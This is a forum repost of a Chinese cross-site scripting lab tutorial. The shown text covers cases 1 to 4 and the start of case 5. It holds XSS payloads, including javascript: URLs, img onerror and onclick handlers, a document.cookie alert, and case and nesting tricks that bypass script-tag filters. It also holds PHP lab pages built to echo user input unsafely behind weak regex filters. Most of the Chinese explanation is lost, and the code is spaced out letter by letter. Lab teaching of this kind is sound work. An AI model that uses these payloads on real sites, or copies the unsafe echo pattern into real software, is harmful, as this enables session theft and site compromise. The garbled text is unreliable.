搜索

[21430] 2020-11-22_[网络安全]六.XSS跨站脚本攻击靶场案例九题及防御方法-2

文档创建者:s7ckTeam
浏览次数:36
最后更新:2025-01-18
2020-11-22_[网络安全]六.XSS跨站脚本攻击靶场案例九题及防御方法-2 [ ]   . X S S - 2 E a s t m o u n t   L e m o n S e c   2 0 2 0 - 1 1 - 2 2 广 1 0 0 W e b X S S F o x X S S 9 A I P y t h o n W e b C V E 绿 . X S S . X S S . X S S . X S S 1 . X S S 1 s c r i p t   <   s c r i p t > a l e r t ( ' x s s ' ) i f r a m e s r c   <   i f r a m e   s r c = j a v a s c r i p t : a l e r t ( ' x s s ' ) > h r e f   <   a   h r e f = j a v a s c r i p t : a l e r t ( ' x s s ' ) > E a s t m o u n t   j a v a s c r i p t : a l e r t ( ' x s s ' ) 使 j a v a s c r i p t : a l e r t ( d o c u m e n t . c o o k i e ) c o o k i e   <   i m g   s c r = 1   o n e r r o r = a l e r t ( ' x s s ' ) >   i m g o n e r r o r i m g o n e r r o r o n e r r o r 使  
<   i m g   s r c = " h t t p : / / w w w . b a i d u . c o m / i m g / l o g o . g i f "   o n c l i c k = a l e r t ( ' x s s ' ) >   s r c o n c l i c k s r c W A M P P H P S T U D Y h t d o c s / x s s X S S < ! D O C T Y P E   h t m l > < h t m l > < h e a d >     < m e t a   c h a r s e t = " u t f - 8 " >     < t i t l e > F O X - X S S - < / t i t l e > < / h e a d > < b o d y > < m e t a   h t t p - e q u i v = " C o n t e n t - T y p e "   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = u t f - 8 " > < s t y l e   t y p e = " t e x t / c s s " > b o d y , t d , t h   {     c o l o r :   # F 0 0 ; } < / s t y l e > < h r > < h 1 > F O X - X S S - < / h 1 > < h r > < h 3 > g e t n a m e x x s 1 . p h p ? n a m e = f o x < b r > : , j s < b r >
f o x h t t p : / / l o c a l h o s t / x s s / x s s 1 . p h p ? n a m e = f o x < s c r i p t > a l e r t ( ' E a s t m o u n t ' ) x s s < b r > < a   h r e f = " h t t p s : / / w p a . q q . c o m / m s g r d ? v = 1 & u i n = 7 9 3 3 5 9 2 9 & s i t e = h o u d a o . c o m & m e n u = y e s " > < / a > < / s t r o n g > H e l l o < ? p h p     h e a d e r ( " C o n t e n t - T y p e : t e x t / h t m l ;   c h a r s e t = u t f - 8 " ) ;     i f ( i s s e t ( $ _ G E T ) & & ! e m p t y ( $ _ G E T ) )   {         $ n a m e   =   $ _ G E T [ " n a m e " ] ;         e c h o   $ n a m e ;     } ? > < / b o d y > < / h t m l >
2 . X S S 2 X S S < ! D O C T Y P E   h t m l > < h t m l > < h e a d >     < m e t a   c h a r s e t = " u t f - 8 " >     < t i t l e > F O X - X S S - < / t i t l e > < / h e a d > < b o d y > < m e t a   h t t p - e q u i v = " C o n t e n t - T y p e "   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = u t f - 8 " > < s t y l e   t y p e = " t e x t / c s s " > b o d y , t d , t h   {     c o l o r :   # F 0 0 ; } < / s t y l e > < h r > < h 1 > F O X - X S S - < / h 1 > < h r > < h 3 > g e t n a m e x x s 2 . p h p ? n a m e = f o x < b r > < b r > , j s < b r > x s s < b r > < a   h r e f = " h t t p s : / / w p a . q q . c o m / m s g r d ? v = 1 & u i n = 7 9 3 3 5 9 2 9 & s i t e = h o u d a o . c o m & m e n u = y e s " > < / a > < / s t r o n g >
< s c r i p t > a l e r t ( ' E a s t m o u n t ' )   s c r i p t p r e g _ r e p l a c e ( " / <   s c r i p t   > / " , " " , $ n a m e ) < / s t r o n g > H e l l o < ? p h p     h e a d e r ( " C o n t e n t - T y p e : t e x t / h t m l ;   c h a r s e t = u t f - 8 " ) ;     i f ( i s s e t ( $ _ G E T ) & & ! e m p t y ( $ _ G E T ) )   {         $ n a m e   =   $ _ G E T [ " n a m e " ] ;         $ n a m e   =   p r e g _ r e p l a c e ( " / < s c r i p t > / " , " " , $ n a m e ) ;         $ n a m e   =   p r e g _ r e p l a c e ( " / < / s c r i p t > / " , " " ,   $ n a m e ) ;         e c h o   $ n a m e ;     } ? > < / b o d y > < / h t m l >
< S c r i p t > a l e r t ( ' E a s t m o u n t ' ) p r e g _ r e p l a c e ( ) <   s c r i p t   > 3 . X S S 3 X S S < ! D O C T Y P E   h t m l > < h t m l > < h e a d >     < m e t a   c h a r s e t = " u t f - 8 " >     < t i t l e > F O X - X S S - < / t i t l e > < / h e a d > < b o d y > < m e t a   h t t p - e q u i v = " C o n t e n t - T y p e "   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = u t f - 8 " > < s t y l e   t y p e = " t e x t / c s s " > b o d y , t d , t h   {     c o l o r :   # F 0 0 ; } < / s t y l e > < h r > < h 1 > F O X - X S S - < / h 1 > < h r > < h 3 > g e t n a m e x x s 3 . p h p ? n a m e = f o x < b r > < b r >
s c r i p t i p r e g _ r e p l a c e ( " / <   s c r i p t   > / i " , " " ,   $ n a m e ) ; p r e g _ r e p l a c e ( ) < s c <   s c r i p t > r i p t > a l e r t ( ' E a s t m o u n t ' ) c r i p t > , j s < b r > x s s < b r > < a   h r e f = " h t t p s : / / w p a . q q . c o m / m s g r d ? v = 1 & u i n = 7 9 3 3 5 9 2 9 & s i t e = h o u d a o . c o m & m e n u = y e s " > < / a > < / s t r o n g > H e l l o < ? p h p     h e a d e r ( " C o n t e n t - T y p e :   t e x t / h t m l ;   c h a r s e t = u t f - 8 " ) ;     i f ( i s s e t ( $ _ G E T ) & & ! e m p t y ( $ _ G E T ) )   {         $ n a m e   =   $ _ G E T [ " n a m e " ] ;         $ n a m e   =   p r e g _ r e p l a c e ( " / < s c r i p t > / i " , " " ,   $ n a m e ) ;         $ n a m e   =   p r e g _ r e p l a c e ( " / < / s c r i p t > / i " , " " ,   $ n a m e ) ;         e c h o   $ n a m e ;     } ? > < / b o d y > < / h t m l >
X S S 4 . X S S 4 X S S n a m e = <   i m g   s r c = " h t t p : / / w w w . b a i d u . c o m / i m g / l o g o . g i f "   o n c l i c k = a l e r t ( ' x s s ' ) > < ! D O C T Y P E   h t m l > < h t m l > < h e a d >     < m e t a   c h a r s e t = " u t f - 8 " >     < t i t l e > F O X - X S S - < / t i t l e > < / h e a d > < b o d y > < m e t a   h t t p - e q u i v = " C o n t e n t - T y p e "   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = u t f - 8 " > < s t y l e   t y p e = " t e x t / c s s " > b o d y , t d , t h   {     c o l o r :   # F 0 0 ; } < / s t y l e > < h r > < h 1 > F O X - X S S - < / h 1 > < h r >
s c r i p t g e t n a m e s c r i p t p r e g m a t c h ( ' / s c r i p t / i ' ,   $ G E T [ " n a m e " ] ) p r e g _ m a t c h ( ) s c r i p t < i m g   > 使 i m g i m g   s r c < h 1 > F O X - X S S - < / h 1 > < h r > < h 3 > g e t n a m e x x s 4 . p h p ? n a m e = f o x < b r > < b r > , j s < b r > x s s < b r > < a   h r e f = " h t t p s : / / w p a . q q . c o m / m s g r d ? v = 1 & u i n = 7 9 3 3 5 9 2 9 & s i t e = h o u d a o . c o m & m e n u = y e s " > < / a > < / s t r o n g > < ? p h p     h e a d e r ( " C o n t e n t - T y p e :   t e x t / h t m l ;   c h a r s e t = u t f - 8 " ) ;     i f ( i s s e t ( $ _ G E T ) & & ! e m p t y ( $ _ G E T ) )   {         i f   ( p r e g _ m a t c h ( ' / s c r i p t / i ' ,   $ _ G E T [ " n a m e " ] ) )   {             d i e ( " e r r o r " ) ;         }     } ? > H e l l o   < ? p h p       i f ( i s s e t ( $ _ G E T ) & & ! e m p t y ( $ _ G E T ) )   {         e c h o   $ _ G E T [ " n a m e " ] ;         } ? > < / b o d y > < / h t m l >
o n e r r o r a l e r t 5 . X S S 5 X S S < ! D O C T Y P E   h t m l > < h t m l > < h e a d >     < m e t a   c h a r s e t = " u t f - 8 " >     < t i t l e > F O X - X S S - < / t i t l e > < / h e a d > < b o d y > < m e t a   h t t p - e q u i v = " C o n t e n t - T y p e "   c o n t e n t = " t e x t / h t m l ;   c h a r s e t = u t f - 8 " > < s t y l e   t y p e = " t e x t / c s s " > b o d y , t d , t h   {     c o l o r :   # F 0 0 ; } < / s t y l e > < h r > < h 1 > F O X - X S S - < / h 1 > < h r > < h 3 > g e t n a m e x x s 5 . p h p ? n a m e = f o x < b r > < b r >
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理